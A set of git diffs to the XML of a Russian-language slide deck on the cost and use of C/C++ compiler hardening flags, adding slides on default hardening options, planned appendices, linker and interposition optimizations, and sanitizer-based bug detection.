+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Хороший дефолтный флаг, но пока реализован только в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>GCC</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId3"/>
+              </a:rPr>
+              <a:t>LLVM #122687</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Конкретный набор зависит от версии компилятора</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="2"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Для </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>GCC </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>можно посмотреть функцию `</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>print_help_hardened</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="2"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>На 2025 год</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>D_FORTIFY_SOURCE=3 -D_GLIBCXX_ASSERTIONS -</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>ftrivial</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>-auto-var-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>init</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>=zero -</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>fPIE</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> -</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>Wl</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>,-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>z,now</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> -</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>Wl</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>,-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>z,relro</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> -</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>fstack</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>-protector-strong -</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>fstack</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>-clash-protection -</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>fcf</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>-protection=full</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2970358473"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide81.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Title 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAC7532A-964A-431E-A4F5-80DD903BB997}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>TODO</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Content Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C484971-452F-45F6-AD84-582487E77763}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr>
+            <a:normAutofit lnSpcReduction="10000"/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Информация о замерах</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>в приложении</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Какие проверялись версии дистрибутивов</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Как считались </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>CVE, KEV</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> (скрипты</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Ссылки на примеры</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> (Stack Clashing)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Как искать проблемные программы (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>no-pie, etc.)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Как запустить бенчмарки </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Clang</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Отдельный слайд про </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Rust</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> (таблица со сравнением)</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Отдельный слайд с рекомендуемыми ссылками</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Слайд с рекомендациями</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Проверить дефолтные опции в дистро, решить с </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Security Team </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>какие </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>hardening</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>-методы включить в проде</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4165890631"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide82.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Title 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA3C8DD7-2659-4877-AB44-B521617A7883}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Спасибо за внимание</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Content Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A014712-4ABE-498A-9B77-26D4F051DB7C}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Вопросы</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> ?</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="836139563"/>
       </p:ext>
     </p:extLst>
   </p:cSld>

--- a/CppZeroCost/2025/RU.pptx
+++ b/CppZeroCost/2025/RU.pptx
@@ -340,7 +340,7 @@
           <a:p>
             <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/13/2025</a:t>
+              <a:t>7/15/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -538,7 +538,7 @@
           <a:p>
             <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/13/2025</a:t>
+              <a:t>7/15/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -746,7 +746,7 @@
           <a:p>
             <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/13/2025</a:t>
+              <a:t>7/15/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -944,7 +944,7 @@
           <a:p>
             <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/13/2025</a:t>
+              <a:t>7/15/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -1219,7 +1219,7 @@
           <a:p>
             <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/13/2025</a:t>
+              <a:t>7/15/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -1484,7 +1484,7 @@
           <a:p>
             <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/13/2025</a:t>
+              <a:t>7/15/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -1896,7 +1896,7 @@
           <a:p>
             <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/13/2025</a:t>
+              <a:t>7/15/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -2037,7 +2037,7 @@
           <a:p>
             <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/13/2025</a:t>
+              <a:t>7/15/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -2150,7 +2150,7 @@
           <a:p>
             <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/13/2025</a:t>
+              <a:t>7/15/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -2461,7 +2461,7 @@
           <a:p>
             <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/13/2025</a:t>
+              <a:t>7/15/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -2749,7 +2749,7 @@
           <a:p>
             <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/13/2025</a:t>
+              <a:t>7/15/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -2990,7 +2990,7 @@
           <a:p>
             <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/13/2025</a:t>
+              <a:t>7/15/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -4055,7 +4055,7 @@
                 <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
-              <a:t> == </a:t>
+              <a:t> =~ </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1">
@@ -4069,24 +4069,36 @@
                 <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
-              <a:t> +</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>дополнительные оптимизации </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>runtime interposition</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0">
-              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-            </a:endParaRPr>
+              <a:t> + -</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>fno</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>semantoc</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-interposition</a:t>
+            </a:r>
           </a:p>
           <a:p>
             <a:pPr lvl="1"/>
@@ -9893,13 +9905,10 @@
               </a:rPr>
               <a:t>a.out</a:t>
             </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>▫</a:t>
-            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+            </a:endParaRPr>
           </a:p>
           <a:p>
             <a:pPr marL="0" indent="0">

--- a/CppZeroCost/2025/RU.pptx
+++ b/CppZeroCost/2025/RU.pptx
@@ -4587,22 +4587,19 @@
                 <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
-              <a:t>-</a:t>
+              <a:t>-semantic-interposition + -</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1">
                 <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
-              <a:t>semantoc</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-interposition</a:t>
-            </a:r>
+              <a:t>Bsymbolic</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+            </a:endParaRPr>
           </a:p>
           <a:p>
             <a:pPr lvl="1"/>
@@ -14980,10 +14977,10 @@
       </p:sp>
       <p:pic>
         <p:nvPicPr>
-          <p:cNvPr id="5" name="Picture 4">
+          <p:cNvPr id="6" name="Picture 5">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA867AB7-6826-44CE-A37D-F08F1BA4A372}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDE69818-05AF-4B55-8163-7BAC62CB970C}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -15006,8 +15003,8 @@
         </p:blipFill>
         <p:spPr>
           <a:xfrm>
-            <a:off x="6732214" y="1520031"/>
-            <a:ext cx="5343525" cy="4962525"/>
+            <a:off x="6296305" y="1530350"/>
+            <a:ext cx="5534025" cy="4962525"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -16583,7 +16580,7 @@
         <p:spPr/>
         <p:txBody>
           <a:bodyPr>
-            <a:normAutofit/>
+            <a:normAutofit lnSpcReduction="10000"/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
@@ -16608,6 +16605,34 @@
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
               <a:t>Но может только замедлить старт программы из-за необходимости разрешения всех символов</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>На </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>X86 </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>имеет смысл совмещать с </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>fno-plt</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> (до 10% прироста производительности)</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -22899,7 +22924,7 @@
         <p:spPr/>
         <p:txBody>
           <a:bodyPr>
-            <a:normAutofit/>
+            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
@@ -23031,6 +23056,29 @@
               </a:rPr>
               <a:t>-strict-aliasing</a:t>
             </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Соответствующие баги можно также обнаруживать с помощью </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>UBSanitizer</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>и </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>TypeSanitizer</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
           <a:p>
             <a:r>

--- a/CppZeroCost/2025/RU.pptx
+++ b/CppZeroCost/2025/RU.pptx
@@ -90,8 +90,11 @@
     <p:sldId id="344" r:id="rId84"/>
     <p:sldId id="330" r:id="rId85"/>
     <p:sldId id="331" r:id="rId86"/>
-    <p:sldId id="271" r:id="rId87"/>
-    <p:sldId id="270" r:id="rId88"/>
+    <p:sldId id="345" r:id="rId87"/>
+    <p:sldId id="346" r:id="rId88"/>
+    <p:sldId id="270" r:id="rId89"/>
+    <p:sldId id="347" r:id="rId90"/>
+    <p:sldId id="271" r:id="rId91"/>
   </p:sldIdLst>
   <p:sldSz cx="12192000" cy="6858000"/>
   <p:notesSz cx="6858000" cy="9144000"/>
@@ -345,7 +348,7 @@
           <a:p>
             <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/18/2025</a:t>
+              <a:t>7/19/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -543,7 +546,7 @@
           <a:p>
             <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/18/2025</a:t>
+              <a:t>7/19/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -751,7 +754,7 @@
           <a:p>
             <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/18/2025</a:t>
+              <a:t>7/19/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -949,7 +952,7 @@
           <a:p>
             <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/18/2025</a:t>
+              <a:t>7/19/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -1224,7 +1227,7 @@
           <a:p>
             <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/18/2025</a:t>
+              <a:t>7/19/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -1489,7 +1492,7 @@
           <a:p>
             <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/18/2025</a:t>
+              <a:t>7/19/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -1901,7 +1904,7 @@
           <a:p>
             <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/18/2025</a:t>
+              <a:t>7/19/2025</a:t>
             </a:fld>
